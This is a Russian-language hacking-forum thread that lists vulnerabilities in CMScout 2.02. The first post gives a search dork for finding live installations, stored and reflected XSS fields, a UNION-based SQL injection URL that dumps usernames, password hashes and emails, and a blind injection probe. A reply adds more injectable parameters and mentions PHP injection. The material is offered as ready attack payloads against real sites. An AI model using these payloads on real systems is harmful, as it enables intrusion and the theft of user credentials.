CMScout

Discussion in 'Веб-уязвимости' started by Roba, 3 Mar 2008.

  1. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    CMScout

    Site: http://cmscout.co.za
    Version: 2.02
    Dork: "Powered by CMScout"

    Active XSS:
    CMScout 2.02 forums >> Test Forum >> New Topic
    Уязвимые поля: "Subject", "Description"​
    User Control Panel >> Profile
    Уязвимые поля: "First Name", "Last Name", "Contributions"​

    CMScout Administration

    Download Manager
    Уязвимые поля:​
    "Name"​
    Photo Album Manager
    Уязвимые поля: "Name"​

    Passive XSS
    Code:
    /index.php?page=forums&f=1&menuid=3[xss]
    Remote SQL Injection:
    Code:
    /admin.php?page=users&subpage=users_view&id=-1+union+select+1,2,concat_ws(0x3a,uname,passwd,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+cms_users/*
    Нету вывода - забираем данные посимвольно.
    Code:
    /admin.php?page=group&action=auth&id=1+and+substring(version(),1,1)=5/*
    Чтобы узнать полный путь к сайту, можно, как вариант посмотреть логи:

    CMScout Administration >> Logfile viewer

    (с) ZAMUT
     
    #1 Roba, 3 Mar 2008
    Last edited: 12 Jul 2008
    6 people like this.
  2. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    скули не в админке ( а нафик в админке они собственно нужны?) )

    Code:
    /index.php?page=polls&id=[B][sql][/B]&menuid=0
    Code:
    /getphoto.php?pic=[B][sql][/B] - посимвольная, либо more one row
    там вообще еще куча багов, кто хочет тот найдет. в том числе и php inj
     
    1 person likes this.